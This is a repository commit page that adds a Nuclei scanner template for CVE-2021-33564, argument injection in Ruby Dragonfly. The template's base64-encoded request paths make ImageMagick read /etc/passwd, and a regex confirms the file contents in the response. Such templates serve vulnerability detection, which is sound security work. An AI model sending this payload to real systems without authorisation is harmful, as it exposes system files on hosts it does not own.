daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1553 from 0xsapra/master 

CVE-2021-33564.yaml
patch-1
Sandeep Singh 2021-05-29 04:13:37 +05:30 committed by GitHub
parent 3b6adda819 0d8c5607cb
commit 5eacd7d819
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
cves/2021/CVE-2021-33564.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2021-33564
info:
name: Argument Injection in Ruby Dragonfly
author: 0xsapra
severity: critical
reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
tags: cve,cve2021,rce,ruby
requests:
- method: GET
path:
- "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
- "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"